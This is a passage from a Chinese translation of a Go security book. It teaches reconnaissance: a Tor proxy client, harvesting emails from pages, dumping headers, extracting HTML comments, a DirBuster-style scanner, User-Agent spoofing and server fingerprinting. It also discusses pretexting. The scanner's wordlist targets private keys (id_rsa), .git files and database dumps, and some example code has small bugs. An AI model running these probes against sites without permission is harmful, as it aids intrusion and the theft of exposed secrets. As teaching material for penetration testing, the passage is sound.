默认的 Tor 端口是9050,或者在使用 Tor 浏览器捆绑包时是9150。以下示例将执行对check.torproject.org的 GET 请求,这将让您知道是否正确地通过 Tor 网络进行路由:

package main

import (
   "io/ioutil"
   "log"
   "net/http"
   "net/url"
   "time"
)

// The Tor proxy server must already be running and listening
func main() {
   targetUrl := "https://check.torproject.org"
   torProxy := "socks5://localhost:9050" // 9150 w/ Tor Browser

   // Parse Tor proxy URL string to a URL type
   torProxyUrl, err := url.Parse(torProxy)
   if err != nil {
      log.Fatal("Error parsing Tor proxy URL:", torProxy, ". ", err)
   }

   // Set up a custom HTTP transport for the client   
   torTransport := &http.Transport{Proxy: http.ProxyURL(torProxyUrl)}
   client := &http.Client{
      Transport: torTransport,
      Timeout: time.Second * 5
   }

   // Make request
   response, err := client.Get(targetUrl)
   if err != nil {
      log.Fatal("Error making GET request. ", err)
   }
   defer response.Body.Close()

   // Read response
   body, err := ioutil.ReadAll(response.Body)
   if err != nil {
      log.Fatal("Error reading body of response. ", err)
   }
   log.Println(string(body))
}

摘要

在本章中,我们介绍了使用 Go 编写 Web 服务器的基础知识。您现在应该可以轻松创建基本的 HTTP 和 HTTPS 服务器。此外,您应该了解中间件的概念,并知道如何使用 Negroni 包来实现预构建和自定义中间件。

我们还介绍了在尝试保护 Web 服务器时的一些最佳实践。您应该了解 CSRF 攻击是什么,以及如何防止它。您应该能够解释本地和远程文件包含以及风险是什么。

标准库中的 Web 服务器具有生产质量,并且具有创建生产就绪 Web 应用程序所需的一切。还有许多其他用于 Web 应用程序的框架,例如 Gorilla、Revel 和 Martini,但是,最终,您将不得不评估每个框架提供的功能,并查看它们是否符合您的项目需求。

我们还介绍了标准库提供的 HTTP 客户端功能。您应该知道如何进行基本的 HTTP 请求和使用客户端证书进行身份验证的请求。您应该了解在进行请求时如何使用 HTTP 代理。

在下一章中,我们将探讨网络爬虫,以从 HTML 格式的网站中提取信息。我们将从基本技术开始,例如字符串匹配和正则表达式,并探讨用于处理 HTML DOM 的goquery包。我们还将介绍如何使用 cookie 在登录会话中爬取。还讨论了指纹识别 Web 应用程序以识别框架。我们还将介绍使用广度优先和深度优先方法爬取网络。

第十章:网络爬取

从网络中收集信息在许多情况下都是有用的。网站可以提供丰富的信息。这些信息可以用于在进行社会工程攻击或钓鱼攻击时提供帮助。您可以找到潜在目标的姓名和电子邮件,或者收集关键词和标题,这些可以帮助快速了解网站的主题或业务。您还可以通过网络爬取技术潜在地了解企业的位置,找到图像和文档,并分析网站的其他方面。

了解目标可以让您创建一个可信的借口。借口是攻击者用来欺骗毫无戒心的受害者,使其遵从某种方式上损害用户、其账户或其设备的请求的常见技术。例如,有人调查一家公司,发现它是一家在特定城市拥有集中式 IT 支持部门的大公司。他们可以打电话或给公司的人发电子邮件,假装是支持技术人员,并要求他们执行操作或提供他们的密码。公司公共网站上的信息可能包含许多用于设置借口情况的细节。

Web 爬行是爬取的另一个方面,它涉及跟随超链接到其他页面。广度优先爬行是指尽可能找到尽可能多的不同网站,并跟随它们以找到更多的站点。深度优先爬行是指在转移到下一个站点之前,爬取单个站点以找到所有可能的页面。

在本章中,我们将涵盖网络爬取和网络爬行。我们将通过示例向您介绍一些基本任务,例如查找链接、文档和图像,寻找隐藏文件和信息,并使用一个名为goquery的强大的第三方包。我们还将讨论减轻对您自己网站的爬取的技术。

在本章中,我们将具体涵盖以下主题:

  • 网络爬取基础知识

  • 字符串匹配

  • 正则表达式

  • 从响应中提取 HTTP 头

  • 使用 cookies

  • 从页面中提取 HTML 注释

  • 在 Web 服务器上搜索未列出的文件

  • 修改您的用户代理

  • 指纹识别 Web 应用程序和服务器

  • 使用 goquery 包

  • 列出页面中的所有链接

  • 列出页面中的所有文档链接

  • 列出页面的标题和标题

  • 计算页面上使用最频繁的单词

  • 列出页面中所有外部 JavaScript 源

  • 深度优先爬行

  • 广度优先爬行

  • 防止网络爬取

网络爬取基础知识

Web 爬取,如本书中所使用的,是从 HTML 结构化页面中提取信息的过程,这些页面是为人类查看而不是以编程方式消费的。一些服务提供了高效的用于编程使用的 API,但有些网站只提供他们的信息在 HTML 页面中。这些网络爬取示例演示了从 HTML 中提取信息的各种方法。我们将看一下基本的字符串匹配,然后是正则表达式,然后是一个名为goquery的强大包,用于网络爬取。

使用 strings 包在 HTTP 响应中查找字符串

要开始,让我们看一下如何进行基本的 HTTP 请求并使用标准库搜索字符串。首先,我们将创建http.Client并设置任何自定义变量;例如,客户端是否应该遵循重定向,应该使用哪组 cookies,或者应该使用哪种传输。

http.Transport类型实现了执行 HTTP 请求和获取响应的网络请求操作。默认情况下,使用http.RoundTripper,这执行单个 HTTP 请求。对于大多数用例,默认传输就足够了。默认情况下,使用环境中的 HTTP 代理,但也可以在传输中指定代理。如果要使用多个代理,这可能很有用。此示例不使用自定义的http.Transport类型,但我想强调http.Transporthttp.Client中的嵌入类型。

我们正在创建一个自定义的 http.Client 类型,但只是为了覆盖 Timeout 字段。默认情况下,没有超时,应用程序可能会永远挂起。

可以在 http.Client 中覆盖的另一种嵌入类型是 http.CookieJar 类型。http.CookieJar 接口需要的两个函数是:SetCookies()Cookies()。标准库附带了 net/http/cookiejar 包,并且其中包含了 CookieJar 的默认实现。多个 cookie jar 的一个用例是登录并存储与网站的多个会话。您可以登录多个用户,并将每个会话存储在一个 cookie jar 中,并根据需要使用每个会话。此示例不使用自定义 cookie jar。

HTTP 响应包含作为读取器接口的主体。我们可以使用接受读取器接口的任何函数从读取器中提取数据。这包括函数,如 io.Copy()io.ReadAtLeast()io.ReadlAll()bufio 缓冲读取器。在此示例中,ioutil.ReadAll() 用于快速将 HTTP 响应的全部内容存储到字节切片变量中。

以下是此示例的代码实现:

// Perform an HTTP request to load a page and search for a string
package main

import (
   "fmt"
   "io/ioutil"
   "log"
   "net/http"
   "os"
   "strings"
   "time"
)

func main() {
   // Load command line arguments
   if len(os.Args) != 3 {
      fmt.Println("Search for a keyword in the contents of a URL")
      fmt.Println("Usage: " + os.Args[0] + " <url> <keyword>")
      fmt.Println("Example: " + os.Args[0] + 
         " https://www.devdungeon.com NanoDano")
      os.Exit(1)
   }
   url := os.Args[1]
   needle := os.Args[2] // Like searching for a needle in a haystack

   // Create a custom http client to override default settings. Optional
   // Use http.Get() instead of client.Get() to use default client.
   client := &http.Client{
      Timeout: 30 * time.Second, // Default is forever!
      // CheckRedirect - Policy for following HTTP redirects
      // Jar - Cookie jar holding cookies
      // Transport - Change default method for making request
   }

   response, err := client.Get(url)
   if err != nil {
      log.Fatal("Error fetching URL. ", err)
   }

   // Read response body
   body, err := ioutil.ReadAll(response.Body)
   if err != nil {
      log.Fatal("Error reading HTTP body. ", err)
   }

   // Search for string
   if strings.Contains(string(body), needle) {
      fmt.Println("Match found for " + needle + " in URL " + url)
   } else {
      fmt.Println("No match found for " + needle + " in URL " + url)
   }
} 

使用正则表达式在页面中查找电子邮件地址

正则表达式,或者 regex,实际上是一种独立的语言形式。本质上,它是一个表达文本搜索模式的特殊字符串。在使用 shell 时,您可能熟悉星号(*)。诸如 ls *.txt 的命令使用简单的正则表达式。在这种情况下,星号代表任何东西;因此只要以 .txt 结尾,任何字符串都会匹配。正则表达式除了星号之外还有其他符号,比如句号(.),它匹配任何单个字符,而不是星号,星号将匹配任意长度的字符串。甚至可以使用少量可用的符号来构建更强大的表达式。

正则表达式以慢而著称。所使用的实现保证以线性时间运行,而不是基于输入长度的指数时间。这意味着它将比许多其他不提供该保证的正则表达式实现运行得更快,比如 Perl。Go 的作者之一 Russ Cox 在 2007 年发表了两种不同方法的深度比较,可在swtch.com/~rsc/regexp/regexp1.html上找到。这对于我们搜索 HTML 页面内容的用例非常重要。如果正则表达式基于输入长度运行时间呈指数增长,可能需要很长时间才能执行某些表达式的搜索。

en.wikipedia.org/wiki/Regular_expression和相关的 Go 文档golang.org/pkg/regexp/中了解更多关于正则表达式的一般知识。

此示例使用正则表达式搜索嵌入在 HTML 中的电子邮件地址链接。它将搜索任何 mailto 链接并提取电子邮件地址。我们将使用默认的 HTTP 客户端,并调用 http.Get(),而不是创建自定义客户端来修改超时。

典型的电子邮件链接看起来像这样:

<a href="mailto:nanodano@devdungeon.com">
<a href="mailto:nanodano@devdungeon.com?subject=Hello">

此示例中使用的正则表达式是:

"mailto:.*?["?]

让我们分解并检查每个部分:

  • "mailto::整个片段只是一个字符串文字。第一个字符是引号("),在正则表达式中没有特殊含义。它被视为普通字符。这意味着正则表达式将首先搜索引号字符。引号后面是文本 mailto 和一个冒号(:)。冒号也没有特殊含义。

  • .*?:句点(.)表示匹配除换行符以外的任何字符。星号表示基于前一个符号(句点)继续匹配零个或多个字符。在星号之后,是一个问号(?)。这个问号告诉星号不要贪婪。它将匹配可能的最短字符串。没有它,星号将继续匹配尽可能长的字符串,同时仍满足完整的正则表达式。我们只想要电子邮件地址本身,而不是任何查询参数,比如?subject,所以我们告诉它进行非贪婪或短匹配。

  • ["?]:正则表达式的最后一部分是["?]集合。括号告诉正则表达式匹配括号内封装的任何字符。我们只有两个字符:引号和问号。这里的问号没有特殊含义,被视为普通字符。括号内的两个字符是电子邮件地址结束的两个可能字符。默认情况下,正则表达式将选择最后一个字符并返回最长的字符串,因为前面的星号会变得贪婪。然而,因为我们在前一节直接在星号后面添加了另一个问号,它将执行非贪婪搜索,并在第一个匹配括号内的字符的地方停止。

使用这种技术意味着我们只会找到在 HTML 中使用<a>标签明确链接的电子邮件。它不会找到在页面中以纯文本形式编写的电子邮件。创建一个正则表达式来搜索基于模式的电子邮件字符串,比如<word>@<word>.<word>,可能看起来很简单,但不同正则表达式实现之间的细微差别以及电子邮件可能具有的复杂变化使得很难制定一个能捕捉到所有有效电子邮件组合的正则表达式。如果您快速在网上搜索一个示例,您会看到有多少变化以及它们变得多么复杂。

如果您正在创建某种网络服务,重要的是通过发送电子邮件并要求他们以某种方式回复或验证链接来验证一个人的电子邮件帐户。我不建议您仅仅依赖正则表达式来确定电子邮件是否有效,我还建议您在使用正则表达式执行客户端电子邮件验证时要非常小心。用户可能有一个在技术上有效的奇怪电子邮件地址,您可能会阻止他们注册到您的服务。

以下是根据 1982 年RFC 822实际有效的电子邮件地址的一些示例:

  • *.*@example.com

  • $what^the.#!$%@example.com

  • !#$%^&*=()@example.com

  • "!@#$%{}^&~*()|/="@example.com

  • "hello@example.com"@example.com

2001 年,RFC 2822取代了RFC 822。在所有先前的示例中,只有最后两个包含 at(@)符号的示例被新的RFC 2822认为是无效的。所有其他示例仍然有效。在www.ietf.org/rfc/rfc822.txtwww.ietf.org/rfc/rfc2822.txt上阅读原始 RFC。

这是该示例的代码实现:

// Search through a URL and find mailto links with email addresses
package main

import (
   "fmt"
   "io/ioutil"
   "log"
   "net/http"
   "os"
   "regexp"
)

func main() {
   // Load command line arguments
   if len(os.Args) != 2 {
      fmt.Println("Search for emails in a URL")
      fmt.Println("Usage: " + os.Args[0] + " <url>")
      fmt.Println("Example: " + os.Args[0] + 
         " https://www.devdungeon.com")
      os.Exit(1)
   }
   url := os.Args[1]

   // Fetch the URL
   response, err := http.Get(url)
   if err != nil {
      log.Fatal("Error fetching URL. ", err)
   }

   // Read the response
   body, err := ioutil.ReadAll(response.Body)
   if err != nil {
      log.Fatal("Error reading HTTP body. ", err)
   }

   // Look for mailto: links using a regular expression
   re := regexp.MustCompile("\"mailto:.*?[?\"]")
   matches := re.FindAllString(string(body), -1)
   if matches == nil {
      // Clean exit if no matches found
      fmt.Println("No emails found.")
      os.Exit(0)
   }

   // Print all emails found
   for _, match := range matches {
      // Remove "mailto prefix and the trailing quote or question mark
      // by performing a slice operation to extract the substring
      cleanedMatch := match[8 : len(match)-1]
      fmt.Println(cleanedMatch)
   }
} 

从 HTTP 响应中提取 HTTP 标头

HTTP 标头包含有关请求和响应的元数据和描述信息。通过检查服务器提供的 HTTP 标头,您可以潜在地了解有关服务器的很多信息。您可以了解服务器的以下信息:

  • 缓存系统

  • 身份验证

  • 操作系统

  • Web 服务器

  • 响应类型

  • 框架或内容管理系统

  • 编程语言

  • 口头语言

  • 安全标头

  • Cookies

并非每个网络服务器都会返回所有这些标头,但从标头中尽可能多地学习是有帮助的。流行的框架,如 WordPress 和 Drupal,将返回一个X-Powered-By标头,告诉您它是 WordPress 还是 Drupal 以及版本。

会话 cookie 也可以透露很多信息。名为PHPSESSID的 cookie 告诉您它很可能是一个 PHP 应用程序。Django 的默认会话 cookie 的名称是sessionid,Java 的是JSESSIONID,Ruby on Rail 的会话 cookie 遵循_APPNAME_session的模式。您可以使用这些线索来识别 Web 服务器。如果您只想要头部而不需要页面的整个主体,您可以始终使用 HTTP HEAD方法而不是 HTTP GETHEAD方法将只返回头部。

这个例子对 URL 进行了一个HEAD请求,并打印出了它的所有头部。http.Response类型包含一个名为Header的字符串到字符串的映射,其中包含每个 HTTP 头的键值对:

// Perform an HTTP HEAD request on a URL and print out headers
package main

import (
   "fmt"
   "log"
   "net/http"
   "os"
)

func main() {
   // Load URL from command line arguments
   if len(os.Args) != 2 {
      fmt.Println(os.Args[0] + " - Perform an HTTP HEAD request to a URL")
      fmt.Println("Usage: " + os.Args[0] + " <url>")
      fmt.Println("Example: " + os.Args[0] + 
         " https://www.devdungeon.com")
      os.Exit(1)
   }
   url := os.Args[1]

   // Perform HTTP HEAD
   response, err := http.Head(url)
   if err != nil {
      log.Fatal("Error fetching URL. ", err)
   }

   // Print out each header key and value pair
   for key, value := range response.Header {
      fmt.Printf("%s: %s\n", key, value[0])
   }
} 

使用 HTTP 客户端设置 cookie

Cookie 是现代 Web 应用程序的一个重要组成部分。Cookie 作为 HTTP 头在客户端和服务器之间来回发送。Cookie 只是由浏览器客户端存储的文本键值对。它们用于在客户端上存储持久数据。它们可以用于存储任何文本值,但通常用于存储首选项、令牌和会话信息。

会话 cookie 通常存储与服务器相匹配的令牌。当用户登录时,服务器会创建一个带有与该用户相关联的标识令牌的会话。然后,服务器以 cookie 的形式将令牌发送回给用户。当客户端以 cookie 的形式发送会话令牌时,服务器会查找并在会话存储中找到匹配的令牌,这可能是数据库、文件或内存中。会话令牌需要足够的熵来确保它是唯一的,攻击者无法猜测。

如果用户在公共 Wi-Fi 网络上,并访问一个不使用 SSL 的网站,附近的任何人都可以看到明文的 HTTP 请求。攻击者可以窃取会话 cookie 并在自己的请求中使用它。当以这种方式 sidejacked cookie 时,攻击者可以冒充受害者。服务器将把他们视为已登录的用户。攻击者可能永远不会知道密码,也不需要知道。

因此,定期注销网站并销毁任何活动会话可能是有用的。一些网站允许您手动销毁所有活动会话。如果您运行一个 Web 服务,我建议您为会话设置合理的过期时间。银行网站通常做得很好,通常强制执行短暂的 10-15 分钟过期时间。

服务器在创建新 cookie 时向客户端发送一个Set-Cookie头。然后客户端使用Cookie头将 cookie 发送回服务器。

这是服务器发送的 cookie 头的一个简单示例:

Set-Cookie: preferred_background=blue
Set-Cookie: session_id=PZRNVYAMDFECHBGDSSRLH

以下是来自客户端的一个示例头部:

Cookie: preferred_background=blue; session_id=PZRNVYAMDFECHBGDSSRLH

Cookie 还可以包含其他属性,例如在第九章中讨论的SecureHttpOnly标志,Web 应用程序。其他属性包括到期日期、域和路径。这个例子只是展示了最简单的应用程序。

在这个例子中,使用自定义会话 cookie 进行了一个简单的请求。会话 cookie 是在向网站发出请求时允许您登录的东西。这个例子应该作为如何使用 cookie 发出请求的参考,而不是一个独立的工具。首先,在main函数之前定义 URL。然后,首先创建 HTTP 请求,指定 HTTP GET方法。由于GET请求通常不需要主体,因此提供了一个空主体。然后,使用一个新的头部,cookie,更新新的请求。在这个例子中,session_id是会话 cookie 的名称,但这将取决于正在交互的 Web 应用程序。

一旦请求准备好,就会创建一个 HTTP 客户端来实际发出请求并处理响应。请注意,HTTP 请求和 HTTP 客户端是独立的实体。例如,您可以多次重用一个请求,使用不同的客户端使用一个请求,并使用单个客户端进行多个请求。这允许您创建多个具有不同会话 cookie 的请求对象,如果需要管理多个客户端会话。

以下是此示例的代码实现:

package main

import (
   "fmt"
   "io/ioutil"
   "log"
   "net/http"
)

var url = "https://www.example.com"

func main() {
   // Create the HTTP request
   request, err := http.NewRequest("GET", url, nil)
   if err != nil {
      log.Fatal("Error creating HTTP request. ", err)
   }

   // Set cookie
   request.Header.Set("Cookie", "session_id=<SESSION_TOKEN>")

   // Create the HTTP client, make request and print response
   httpClient := &http.Client{}
   response, err := httpClient.Do(request)
   data, err := ioutil.ReadAll(response.Body)
   fmt.Printf("%s\n", data)
} 

在网页中查找 HTML 注释

HTML 注释有时可能包含惊人的信息。我个人见过在 HTML 注释中包含管理员用户名和密码的网站。我还见过整个菜单被注释掉,但链接仍然有效,可以直接访问。您永远不知道一个粗心的开发人员可能留下什么样的信息。

如果您要在代码中留下评论,最好将它们留在服务器端代码中,而不是在面向客户端的 HTML 和 JavaScript 中。在 PHP、Ruby、Python 或其他后端代码中进行注释。您永远不希望在代码中向客户端提供比他们需要的更多信息。

此程序中使用的正则表达式由几个特殊序列组成。以下是完整的正则表达式。它基本上是说,“匹配<!---->之间的任何内容。”让我们逐个检查它:

  • <!--(.|\n)*?-->:开头和结尾分别是<!---->,这是 HTML 注释的开始和结束标记。这些是普通字符,而不是正则表达式的特殊字符。

  • (.|\n)*?:这可以分解为两部分:

    • (.|\n):第一部分有一些特殊字符。括号()括起一组选项。管道|分隔选项。选项本身是点.和换行字符\n。点表示匹配任何字符,除了换行符。因为 HTML 注释可以跨多行,我们希望匹配任何字符,包括换行符。整个部分(.|\n)表示匹配点或换行符。
    • *?:星号表示继续匹配前一个字符或表达式零次或多次。紧接在星号之前的是括号集,因此它将继续尝试匹配(.|\n)。问号告诉星号是非贪婪的,或者返回可能的最小匹配。没有问号,以指定它为非贪婪;它将匹配可能的最大内容,这意味着它将从页面中第一个注释的开头开始,并在页面中最后一个注释的结尾结束,包括中间的所有内容。

尝试运行此程序针对一些网站,并查看您能找到什么样的 HTML 注释。您可能会对您能发现的信息感到惊讶。例如,MailChimp 注册表单附带了一个 HTML 注释,实际上为您提供了绕过机器人注册预防的提示。MailChimp 注册表单使用了一个蜜罐字段,不应该填写,否则它会假定该表单是由机器人提交的。看看您能找到什么。

此示例首先获取提供的 URL,然后使用我们之前讨论过的正则表达式搜索 HTML 注释。然后将找到的每个匹配打印到标准输出:

// Search through a URL and find HTML comments
package main

import (
   "fmt"
   "io/ioutil"
   "log"
   "net/http"
   "os"
   "regexp"
)

func main() {
   // Load command line arguments
   if len(os.Args) != 2 {
      fmt.Println("Search for HTML comments in a URL")
      fmt.Println("Usage: " + os.Args[0] + " <url>")
      fmt.Println("Example: " + os.Args[0] + 
         " https://www.devdungeon.com")
      os.Exit(1)
   }
   url := os.Args[1]

   // Fetch the URL and get response
   response, err := http.Get(url)
   if err != nil {
      log.Fatal("Error fetching URL. ", err)
   }
   body, err := ioutil.ReadAll(response.Body)
   if err != nil {
      log.Fatal("Error reading HTTP body. ", err)
   }

   // Look for HTML comments using a regular expression
   re := regexp.MustCompile("<!--(.|\n)*?-->")
   matches := re.FindAllString(string(body), -1)
   if matches == nil {
      // Clean exit if no matches found
      fmt.Println("No HTML comments found.")
      os.Exit(0)
   }

   // Print all HTML comments found
   for _, match := range matches {
      fmt.Println(match)
   }
} 

在网络服务器上查找未列出的文件

有一个名为 DirBuster 的流行程序,渗透测试人员用于查找未列出的文件。DirBuster 是一个 OWASP 项目,预装在流行的渗透测试 Linux 发行版 Kali 上。只需使用标准库,我们就可以创建一个快速、并发和简单的 DirBuster 克隆,只需几行代码。有关 DirBuster 的更多信息,请访问www.owasp.org/index.php/Category:OWASP_DirBuster_Project

这个程序是 DirBuster 的一个简单克隆,它基于一个单词列表搜索未列出的文件。你将不得不创建自己的单词列表。这里提供了一小部分示例文件名,以便给你一些想法,并用作起始列表。根据你自己的经验和源代码构建你的文件列表。一些 Web 应用程序有特定名称的文件,这将允许你指纹识别使用的框架。还要寻找备份文件、配置文件、版本控制文件、更改日志文件、私钥、应用程序日志以及任何不打算公开的东西。你也可以在互联网上找到预先构建的单词列表,包括 DirBuster 的列表。

以下是一个你可以搜索的文件的示例列表:

  • .gitignore

  • .git/HEAD

  • id_rsa

  • debug.log

  • database.sql

  • index-old.html

  • backup.zip

  • config.ini

  • settings.ini

  • settings.php.bak

  • CHANGELOG.txt

这个程序将使用提供的单词列表搜索一个域,并报告任何没有返回 404 NOT FOUND 响应的文件。单词列表应该用换行符分隔文件名,并且每行一个文件名。在提供域名作为参数时,尾随斜杠是可选的,程序将在有或没有域名尾随斜杠的情况下正常运行。但是协议必须被指定,这样请求才知道是使用 HTTP 还是 HTTPS。

url.Parse()函数用于创建一个正确的 URL 对象。使用 URL 类型,你可以独立修改Path而不修改HostScheme。这提供了一种简单的方法来更新 URL,而不必求助于手动字符串操作。

为了逐行读取文件,使用了一个 scanner。默认情况下,scanner 按照换行符分割,但可以通过调用scanner.Split()并提供自定义分割函数来覆盖。我们使用默认行为,因为单词应该是在单独的行上提供的。

// Look for unlisted files on a domain
package main

import (
   "bufio"
   "fmt"
   "log"
   "net/http"
   "net/url"
   "os"
   "strconv"
)

// Given a base URL (protocol+hostname) and a filepath (relative URL)
// perform an HTTP HEAD and see if the path exists.
// If the path returns a 200 OK print out the path
func checkIfUrlExists(baseUrl, filePath string, doneChannel chan bool) {
   // Create URL object from raw string
   targetUrl, err := url.Parse(baseUrl)
   if err != nil {
      log.Println("Error parsing base URL. ", err)
   }
   // Set the part of the URL after the host name
   targetUrl.Path = filePath

   // Perform a HEAD only, checking status without
   // downloading the entire file
   response, err := http.Head(targetUrl.String())
   if err != nil {
      log.Println("Error fetching ", targetUrl.String())
   }

   // If server returns 200 OK file can be downloaded
   if response.StatusCode == 200 {
      log.Println(targetUrl.String())
   }

   // Signal completion so next thread can start
   doneChannel <- true
}

func main() {
   // Load command line arguments
   if len(os.Args) != 4 {
      fmt.Println(os.Args[0] + " - Perform an HTTP HEAD request to a URL")
      fmt.Println("Usage: " + os.Args[0] + 
         " <wordlist_file> <url> <maxThreads>")
      fmt.Println("Example: " + os.Args[0] + 
         " wordlist.txt https://www.devdungeon.com 10")
      os.Exit(1)
   }
   wordlistFilename := os.Args[1]
   baseUrl := os.Args[2]
   maxThreads, err := strconv.Atoi(os.Args[3])
   if err != nil {
      log.Fatal("Error converting maxThread value to integer. ", err)
   }

   // Track how many threads are active to avoid
   // flooding a web server
   activeThreads := 0
   doneChannel := make(chan bool)

   // Open word list file for reading
   wordlistFile, err := os.Open(wordlistFilename)
   if err != nil {
      log.Fatal("Error opening wordlist file. ", err)
   }

   // Read each line and do an HTTP HEAD
   scanner := bufio.NewScanner(wordlistFile)
   for scanner.Scan() {
      go checkIfUrlExists(baseUrl, scanner.Text(), doneChannel)
      activeThreads++

      // Wait until a done signal before next if max threads reached
      if activeThreads >= maxThreads {
         <-doneChannel
         activeThreads -= 1
      }
   }

   // Wait for all threads before repeating and fetching a new batch
   for activeThreads > 0 {
      <-doneChannel
      activeThreads -= 1
   }

   // Scanner errors must be checked manually
   if err := scanner.Err(); err != nil {
      log.Fatal("Error reading wordlist file. ", err)
   }
} 

更改请求的用户代理

一个常见的阻止爬虫和网络爬虫的技术是阻止特定的用户代理。一些服务会把包含关键词如curlpython的特定用户代理列入黑名单。你可以通过简单地将你的用户代理更改为firefox来绕过大部分这些限制。

要设置用户代理,你必须首先创建 HTTP 请求对象。在实际请求之前必须设置头部。这意味着你不能使用http.Get()等快捷便利函数。我们必须创建客户端,然后创建一个请求,然后使用客户端来client.Do()请求。

这个例子使用http.NewRequest()创建了一个 HTTP 请求,然后修改请求头来覆盖User-Agent头部。你可以用这个来隐藏、伪装或者诚实。为了成为一个良好的网络公民,我建议你为你的爬虫创建一个独特的用户代理,这样网站管理员可以限制或者阻止你的机器人。我还建议你在用户代理中包含一个网站或者电子邮件地址,这样网站管理员可以请求跳过你的爬虫。

以下是这个例子的代码实现:

// Change HTTP user agent
package main

import (
   "log"
   "net/http"
)

func main() {
   // Create the request for use later
   client := &http.Client{}
   request, err := http.NewRequest("GET", 
      "https://www.devdungeon.com", nil)
   if err != nil {
      log.Fatal("Error creating request. ", err)
   }

   // Override the user agent
   request.Header.Set("User-Agent", "_Custom User Agent_")

   // Perform the request, ignore response.
   _, err = client.Do(request)
   if err != nil {
      log.Fatal("Error making request. ", err)
   }
} 

指纹识别 Web 应用程序技术栈

指纹识别 Web 应用程序是指尝试识别用于提供 Web 应用程序的技术。指纹识别可以在几个级别进行。在较低级别,HTTP 头可以提供关于正在运行的操作系统(如 Windows 或 Linux)和 Web 服务器(如 Apache 或 nginx)的线索。头部还可以提供有关应用程序级别使用的编程语言或框架的信息。在较高级别,Web 应用程序可以被指纹识别以确定正在使用哪些 JavaScript 库,是否包括任何分析平台,是否显示任何广告网络,正在使用的缓存层等信息。我们将首先查看 HTTP 头部,然后涵盖更复杂的指纹识别方法。

指纹识别是攻击或渗透测试中的关键步骤,因为它有助于缩小选项并确定要采取的路径。识别正在使用的技术还让您可以搜索已知的漏洞。如果一个 Web 应用程序没有及时更新,简单的指纹识别和漏洞搜索可能就足以找到并利用已知的漏洞。如果没有其他办法,它也可以帮助您了解目标。

基于 HTTP 响应头的指纹识别

我建议您首先检查 HTTP 头,因为它们是简单的键值对,通常每个请求只返回几个。手动浏览头部不会花费太长时间,所以您可以在继续应用程序之前首先检查它们。应用程序级别的指纹识别更加复杂,我们稍后会谈论这个。在本章的前面,有一个关于提取 HTTP 头并打印它们以供检查的部分(从 HTTP 响应中提取 HTTP 头部分)。您可以使用该程序来转储不同网页的头部并查看您能找到什么。

基本思想很简单。寻找关键字。特别是一些头部包含最明显的线索,例如X-Powered-ByServerX-Generator头部。X-Powered-By头部可以包含正在使用的框架或内容管理系统CMS)的名称,例如 WordPress 或 Drupal。

检查头部有两个基本步骤。首先,您需要获取头部。使用本章前面提供的示例来提取 HTTP 头。第二步是进行字符串搜索以查找关键字。您可以使用strings.ToUpper()strings.Contains()直接搜索关键字,或者使用正则表达式。请参考本章前面的示例,了解如何使用正则表达式。一旦您能够搜索头部,您只需要能够生成要搜索的关键字列表。

有许多关键字可以搜索。您搜索的内容将取决于您要寻找的内容。我将尝试涵盖几个广泛的类别,以便给您一些寻找内容的想法。您可以尝试识别的第一件事是主机正在运行的操作系统。以下是一个示例关键字列表,您可以在 HTTP 头部中找到,以指示操作系统:

  • Linux

  • Debian

  • Fedora

  • Red Hat

  • CentOS

  • Ubuntu

  • FreeBSD

  • Win32

  • Win64

  • Darwin

以下是一些关键字,可以帮助您确定正在使用哪种 Web 服务器。这绝不是一个详尽的列表,但涵盖了几个关键字,如果您在互联网上搜索,将会产生结果:

  • Apache

  • Nginx

  • Microsoft-IIS

  • Tomcat

  • WEBrick

  • Lighttpd

  • IBM HTTP Server

确定正在使用的编程语言可以在攻击选择上产生很大的影响。像 PHP 这样的脚本语言对不同的东西都是脆弱的,与 Java 服务器或 ASP.NET 应用程序不同。以下是一些示例关键字,您可以使用它们在 HTTP 头中搜索,以确定哪种语言支持应用程序:

  • Python

  • Ruby

  • Perl

  • PHP

  • ASP.NET

会话 cookie 也是确定使用的框架或语言的重要线索。例如,PHPSESSID表示 PHP,JSESSIONID表示 Java。以下是一些会话 cookie,您可以搜索:

  • PHPSESSID

  • JSESSIONID

  • session

  • sessionid

  • CFID/CFTOKEN

  • ASP.NET_SessionId

指纹识别 Web 应用程序

一般来说,指纹识别 Web 应用程序涵盖的范围要比仅查看 HTTP 头部要广泛得多。您可以在 HTTP 头部中进行基本的关键字搜索,就像刚才讨论的那样,并且可以学到很多,但是在 HTML 源代码和服务器上的其他文件的内容或简单存在中也有大量信息。

在 HTML 源代码中,你可以寻找一些线索,比如页面本身的结构以及 HTML 元素的类和 ID 的名称。AngularJS 应用程序具有独特的 HTML 属性,比如ng-app,可以用作指纹识别的关键词。Angular 通常也包含在script标签中,就像其他框架如 jQuery 一样。script标签也可以被检查以寻找其他线索。寻找诸如 Google Analytics、AdSense、Yahoo 广告、Facebook、Disqus、Twitter 和其他第三方嵌入的 JavaScript 等内容。

仅仅通过 URL 中的文件扩展名就可以告诉你正在使用的是什么语言。例如,.php.jsp.asp分别表示正在使用 PHP、Java 和 ASP。

我们还研究了一个在网页中查找 HTML 注释的程序。一些框架和 CMS 会留下可识别的页脚或隐藏的 HTML 注释。有时标记以小图片的形式出现。

目录结构也可以是另一个线索。首先需要熟悉不同的框架。例如,Drupal 将站点信息存储在一个名为/sites/default的目录中。如果你尝试访问该 URL,并且收到 403 FORBIDDEN 的响应而不是 404 NOT FOUND 错误,那么你很可能找到了一个基于 Drupal 的网站。

寻找诸如wp-cron.php之类的文件。在在 Web 服务器上查找未列出的文件部分,我们研究了使用 DirBuster 克隆来查找未列出的文件。找到一组可以用来指纹识别 Web 应用程序的唯一文件,并将它们添加到你的单词列表中。你可以通过检查不同 Web 框架的代码库来确定要查找哪些文件。例如,WordPress 和 Drupal 的源代码是公开可用的。使用本章早些时候讨论的用于查找未列出文件的程序来搜索文件。你还可以搜索与文档相关的其他未列出的文件,比如CHANGELOG.txtreadme.txtreadme.mdreadme.htmlLICENSE.txtinstall.txtinstall.php

通过指纹识别正在运行的应用程序的版本,可以更详细地了解 Web 应用程序。如果你可以访问源代码,这将更容易。我将以 WordPress 为例,因为它是如此普遍,并且源代码可以在 GitHub 上找到github.com/WordPress/WordPress

目标是找出版本之间的差异。WordPress 是一个很好的例子,因为它们都带有包含所有管理界面的/wp-admin/目录。在/wp-admin/目录中,有cssjs文件夹,分别包含样式表和脚本。当网站托管在服务器上时,这些文件是公开可访问的。对这些文件夹使用diff命令,以确定哪些版本引入了新文件,哪些版本删除了文件,哪些版本修改了现有文件。将所有这些信息结合起来,通常可以将应用程序缩小到特定版本,或者至少缩小到一小范围的版本。

